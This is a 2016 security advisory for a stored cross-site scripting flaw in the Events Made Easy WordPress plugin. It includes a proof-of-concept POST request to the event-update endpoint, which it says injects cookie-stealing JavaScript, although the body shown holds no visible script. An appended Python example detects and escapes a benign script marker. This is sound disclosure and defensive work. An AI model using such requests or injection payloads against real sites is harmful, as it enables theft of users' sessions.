------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Events Made Easy WordPress plugin
------------------------------------------------------------------------
Job Diesveld, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability has been found in the Events Made Easy WordPress plugin. By using this issue an attacker can create a specially crafted event which, when posted to WordPress, injects malicious JavaScript code into the application. This code will execute within the browser of any user who views the relevant application content.
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160729-0001
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in Events Made Easy plugin version 1.6.21.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html

Proof of Concept

The following request can be used to create an event containing JavaScript that will obtain the cookie of the current user:

POST /wp-admin/admin.php?page=events-manager&eme_admin_action=update_event&event_id=16 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------224523339434990794855940370
Content-Length: 8579

-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_status"

5
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_id"

-1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_seats"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="price"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="currency"

EUR
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_max_allowed"

10
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_min_allowed"

1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discount"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discountgroup"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_days"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_hours"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_end_target"

start
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_name"

fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_slug"

fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_date"

07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_start_date"

2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_end_date"

07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_end_date"

2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_freq"

daily
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_interval"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byweekno"

1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byday"

1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_start_date"

07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_date"

2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_end_date"

07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_date"

2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_time"

01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_time"

01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_page_title_format_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_page_title_format"

lalalala
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_single_event_format_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_single_event_format"

#_STARTDATE - #_STARTTIME

#_TOWN

#_NOTES

#_ADDBOOKINGFORM

#_MAP

-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_contactperson_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_email_body"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_recorded_ok_html_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_recorded_ok_html"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_respondent_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_respondent_email_body"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_pending_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_pending_email_body"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_updated_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_updated_email_body"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_cancelled_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_cancelled_email_body"

Dear #_RESPNAME,

Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been cancelled.

Yours faithfully,awfe
#_CONTACTPERSON
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_denied_email_body_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_denied_email_body"

Dear #_RESPNAME,

Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been denied.

Yours faithfully,
#_CONTACTPERSONawef
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_form_format_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_form_format"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_cancel_form_format_tpl"

0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_cancel_form_format"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_name"

piet
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_address"

kaas
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_town"

foo
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_latitude"

57.198
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_longitude"

9.67063
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="content"

gold
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_url"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_id"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_url"


-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_update_button"

Update AA>>
-----------------------------224523339434990794855940370--
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.
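As an added illustration (not part of the advisory, and not the plugin's or its fix's code): a small Python script that parses a multipart/form-data body in the same format as the Proof of Concept above, flags event fields whose submitted value carries HTML markup, and applies the output-escaping that turns a stored payload back into inert text. The sample body, the reuse of the PoC's boundary and field names, and the benign `<script>alert(1)</script>` marker are constructed for the example; `esc_html()` is named only as the WordPress equivalent of the escaping shown.

```python
import html
import re

# Boundary string from the advisory's PoC request.
BOUNDARY = "---------------------------224523339434990794855940370"
# Anything a browser would treat as a tag: "<" or "</" followed by a letter.
TAG_RE = re.compile(r"</?[a-zA-Z][^>]*>")

def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser for text parts (no file uploads);
    enough for the event form, a real server uses its framework's parser."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if not part or part == "--":  # preamble or closing delimiter
            continue
        head, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]+)"', head)
        if match:
            fields[match.group(1)] = value
    return fields

def find_html_fields(fields: dict) -> dict:
    """Return the submitted fields whose value contains HTML markup."""
    return {k: v for k, v in fields.items() if TAG_RE.search(v)}

def escape_for_output(value: str) -> str:
    """HTML-escape a stored value before echoing it into a page (the job
    WordPress's esc_html() does), so the browser renders markup as text."""
    return html.escape(value, quote=True)

def build_body(fields: dict) -> str:
    """Encode fields the way the PoC request does (used for the sample)."""
    parts = [f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{n}"'
             f"\r\n\r\n{v}\r\n" for n, v in fields.items()]
    return "".join(parts) + f"--{BOUNDARY}--\r\n"

# Constructed sample: PoC field names, with a benign script marker in
# event_name standing in for the payload (not the advisory's actual value).
SAMPLE_BODY = build_body({
    "event_status": "5",
    "event_name": "fooname<script>alert(1)</script>",
    "location_town": "foo",
    "content": "gold",
})

if __name__ == "__main__":
    for name, raw in find_html_fields(parse_multipart(SAMPLE_BODY, BOUNDARY)).items():
        print(f"{name}: raw {raw!r} -> escaped {escape_for_output(raw)!r}")
```

Fields such as `event_single_event_format` are templates that legitimately hold HTML, so for those a whitelist-based sanitiser (WordPress's `wp_kses_post()`) rather than full escaping is the appropriate control.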